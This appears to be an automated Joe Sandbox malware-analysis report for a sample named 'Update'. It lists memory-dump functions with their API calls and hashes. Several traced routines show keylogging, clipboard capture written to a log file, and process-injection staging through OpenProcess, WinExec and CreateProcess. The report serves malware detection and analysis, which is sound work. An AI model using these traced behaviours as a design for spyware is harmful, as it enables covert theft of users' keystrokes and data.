• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: Ios_base_dtorstd::ios_base::_
• String ID:
• API String ID: 323602529-0
• Opcode ID: f7d636138ce4088a6d1cba00ab0d216eb9a594f20d6ddd3deca44f4b3a3ef603
• Instruction ID: bd9ff0fb9d8f3c5b4dfb63c8a1a123a22dc24f791f01f9d9b58ee74f7fd75d94
• Opcode Fuzzy Hash: f7d636138ce4088a6d1cba00ab0d216eb9a594f20d6ddd3deca44f4b3a3ef603
• Instruction Fuzzy Hash: 61818BB1A11B018BD724CF24C880BA6B7E5FF49308F548A2DE49A47B80E775F549CF91
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dabcda0585e82290d49d84cec2ef0ea519b7641745922247e4d5225594cec0c
• Instruction ID: e84ce27c6e4ee5cdf1941ae928fe1bd467cc744f95d738c144362b25b93e1f04
• Opcode Fuzzy Hash: 2dabcda0585e82290d49d84cec2ef0ea519b7641745922247e4d5225594cec0c
• Instruction Fuzzy Hash: 7051C470A04244AFDB04CF98C881A9D7FB5EF89328F288158F85A5B751D372DE52CF91
APIs
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: d9e13e1a2f9f8d5d8bda3704c8dcca783ca751413efd6114b73de8aa7cfe448e
• Instruction ID: b62f5f724c18be2f29463695a2268dc74fefec22a8caaf8adc37065b795ce1bc
• Opcode Fuzzy Hash: d9e13e1a2f9f8d5d8bda3704c8dcca783ca751413efd6114b73de8aa7cfe448e
• Instruction Fuzzy Hash: D2114F71A0420AAFCB05DF98E94099B7BF9EF89304F154059F809AB311DA71D922CFA5
APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,034F454A,00000000,00000001,00000000,00000000,00000000,?,034F3E0D,00000001,00000214,?,034F4500), ref: 034FA735
  • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
• Opcode ID: 72ae508076be0de94aed332ddd116a627e065c4c34aeb7aecd0084b1e214fe3e
• Instruction ID: 62e7995af7f249d5359fec4fb1539c5211634b7cfa2dc7680fed4404df89ccb2
• Opcode Fuzzy Hash: 72ae508076be0de94aed332ddd116a627e065c4c34aeb7aecd0084b1e214fe3e
• Instruction Fuzzy Hash: 3A01B1392002159EEB24EE25DC44F6B37E8AF817A4F1D862BE9198F2A0D734D4018F58
APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598
  • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
• Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
• Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
• Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
• Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80
                                                                                            APIs
                                                                                              • Part of subcall function 6C39A641: HeapAlloc.KERNEL32(00000000,6C39DBE2,?,?,6C39DBE2,00000220,?,?,?), ref: 6C39A673
                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,6C392C0C,00000000,?,6C39FC77,00000000,6C392C0C,000000FF,?,?,?,6C392CE6,?,000000FF), ref: 6C3A3572
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocAllocate
                                                                                            • String ID:
                                                                                            • API String ID: 2177240990-0
                                                                                            • Opcode ID: 6333b56ace79e0ea95e72b82c2e02feb6ce64c4c49cb9e19bb6f28686d86439e
                                                                                            • Instruction ID: 95a4c1f0e0b57da3336d58cf9b99c4e1ebe5740c26c341077f7bf19ed16194b8
                                                                                            • Opcode Fuzzy Hash: 6333b56ace79e0ea95e72b82c2e02feb6ce64c4c49cb9e19bb6f28686d86439e
                                                                                            • Instruction Fuzzy Hash: A3F0463264510066DF441AAFEC00ABA37ADCFC2B78B104115F864A7A90EB22D6268D72
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,6C39A8E0,00000001,00000364,?,00000006,000000FF,?,?,6C395151,?,6C371A6D,00000000), ref: 6C39CFB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: ae9873cf208bab71d6edd9d09f14a22819557aeac2469c081aab18dc5ccf7e41
                                                                                            • Instruction ID: 1cc9f19b65d018d1dadcccc61a813a14a861e93c0af7135549dddf0d46b54888
                                                                                            • Opcode Fuzzy Hash: ae9873cf208bab71d6edd9d09f14a22819557aeac2469c081aab18dc5ccf7e41
                                                                                            • Instruction Fuzzy Hash: F1F0E93264552557EF117E26B804A8BB75CEF52768B248126EC1BD6980FB31D8048FB1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                                            • Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
                                                                                            • Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                                            • Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6C3A9C90,?,?,00000000,?,6C3A9C90,FFFFFFFF,0000000C), ref: 6C3AA009
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 7ff8b5be17f6cb9203be8aed4c1200a9f8c18d1aa15f7316413d504b827978b7
                                                                                            • Instruction ID: ee21946de02149c3840cc275ea12a5e2a88f51be7bdbabbd6513e436b34cda6d
                                                                                            • Opcode Fuzzy Hash: 7ff8b5be17f6cb9203be8aed4c1200a9f8c18d1aa15f7316413d504b827978b7
                                                                                            • Instruction Fuzzy Hash: D7D06C3210020DBBDF028E84DC06EDA3BAAFB48714F014000FA18A6020C732E861EB94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                            • Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
                                                                                            • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                            • Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001FAB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                                            • Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
                                                                                            • Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                                            • Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                                            • Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
                                                                                            • Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                                            • Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553
                                                                                            APIs
                                                                                            • TCGamerUpdateMain.UPDATE(?,?), ref: 0002100B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: GamerMainUpdate
                                                                                            • String ID:
                                                                                            • API String ID: 3533789159-0
                                                                                            • Opcode ID: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                                                                            • Instruction ID: b6ef548c66d66bbbbda11579d30d492b49407b9ff5cbf57de7122c4c6695da29
                                                                                            • Opcode Fuzzy Hash: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                                                                            • Instruction Fuzzy Hash: 81B092B656020C7B8B44EAD8EC82CDA339C5B58750B408014BE0C8B242E976FA9087A1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID:
                                                                                            • API String ID: 2809346765-0
                                                                                            • Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                                            • Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
                                                                                            • Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                                            • Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9bad77c0454ea42c43571cb445b654ff3a7fc6748818a994e533720029378190
                                                                                            • Instruction ID: 85cdb5b54c8acb9fef6835098284d0e826a58c8f75799684903775f3aa5e0fbb
                                                                                            • Opcode Fuzzy Hash: 9bad77c0454ea42c43571cb445b654ff3a7fc6748818a994e533720029378190
                                                                                            • Instruction Fuzzy Hash: A761E672A046069BCB24CF69C4A0659B3B5FF46328F108329D06997E80E739E495CFF6
                                                                                            APIs
                                                                                            • Sleep.KERNEL32 ref: 10005EB2
                                                                                              • Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 617756273-0
                                                                                            • Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                                            • Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
                                                                                            • Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                                            • Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 464345d43f8d070fa7468847a4a067db7c8ba29ea5911be32b5103a462189420
                                                                                            • Instruction ID: 3211c28c215208bbae4fa7b9b363666a254ee15bc8f15742e3b1ca030f1b310c
                                                                                            • Opcode Fuzzy Hash: 464345d43f8d070fa7468847a4a067db7c8ba29ea5911be32b5103a462189420
                                                                                            • Instruction Fuzzy Hash: FDA002B17521044687145774580EC8675E89FBA71274185217311E9144DA748090D939
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EE8A9
                                                                                            • Sleep.KERNEL32(00000001,?,?,?,034E604D), ref: 034EE8B3
                                                                                            • GetTickCount.KERNEL32 ref: 034EE8BF
                                                                                            • GetTickCount.KERNEL32 ref: 034EE8D2
                                                                                            • InterlockedExchange.KERNEL32(03511F08,00000000), ref: 034EE8DA
                                                                                            • OpenClipboard.USER32(00000000), ref: 034EE8E2
                                                                                            • GetClipboardData.USER32(0000000D), ref: 034EE8EA
                                                                                            • GlobalSize.KERNEL32(00000000), ref: 034EE8FB
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 034EE90C
                                                                                            • wsprintfW.USER32 ref: 034EE985
                                                                                            • _memset.LIBCMT ref: 034EE9A3
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 034EE9AC
                                                                                            • CloseClipboard.USER32 ref: 034EE9B2
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 034EE9CA
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 034EE9E4
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EEA02
                                                                                            • lstrlenW.KERNEL32(03505B48,?,00000000), ref: 034EEA16
                                                                                            • WriteFile.KERNEL32(00000000,03505B48,00000000), ref: 034EEA25
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EEA2C
                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 034EEA38
                                                                                            • GetKeyState.USER32(00000014), ref: 034EEABC
                                                                                            • lstrlenW.KERNEL32(0350B4A8), ref: 034EEB0B
                                                                                            • wsprintfW.USER32 ref: 034EEB1D
                                                                                            • lstrlenW.KERNEL32(0350B4D0), ref: 034EEB3E
                                                                                            • lstrlenW.KERNEL32(0350B4D0), ref: 034EEB61
                                                                                            • wsprintfW.USER32 ref: 034EEB7F
                                                                                            • wsprintfW.USER32 ref: 034EEB95
                                                                                            • wsprintfW.USER32 ref: 034EEBBF
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 034EEC0B
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 034EEC21
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 034EEC3B
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EEC59
                                                                                            • lstrlenW.KERNEL32(00000000,?,00000000), ref: 034EEC69
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 034EEC74
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EEC7B
                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 034EEC88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                            • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                            • API String ID: 1637302245-2373594894
                                                                                            • Opcode ID: d83d01412e04efe5e028f11715d2602f053ce34a1241f4a703b67a7f21e3dc25
                                                                                            • Instruction ID: 31af232debb2e31db2cc20c9c7f3b5eb7f03797160e1fd6583f6c850023caec6
                                                                                            • Opcode Fuzzy Hash: d83d01412e04efe5e028f11715d2602f053ce34a1241f4a703b67a7f21e3dc25
                                                                                            • Instruction Fuzzy Hash: 10C1E570500301AFD720EF65DC4DFAAB7B4FB08705F04499AE25ACA2A4D77196CADF64
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E7804
                                                                                            • _memset.LIBCMT ref: 034E7850
                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 034E7864
                                                                                              • Part of subcall function 034E8720: _vswprintf_s.LIBCMT ref: 034E8731
                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7893
                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 034E78DA
                                                                                              • Part of subcall function 034E7740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,034E78FC), ref: 034E7756
                                                                                              • Part of subcall function 034E7740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,034E78FC,?,?,?,?,?,?,74DF0630), ref: 034E775D
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E790A
                                                                                            • _memset.LIBCMT ref: 034E7923
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E793B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7944
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7956
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7959
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E796B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E796E
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7980
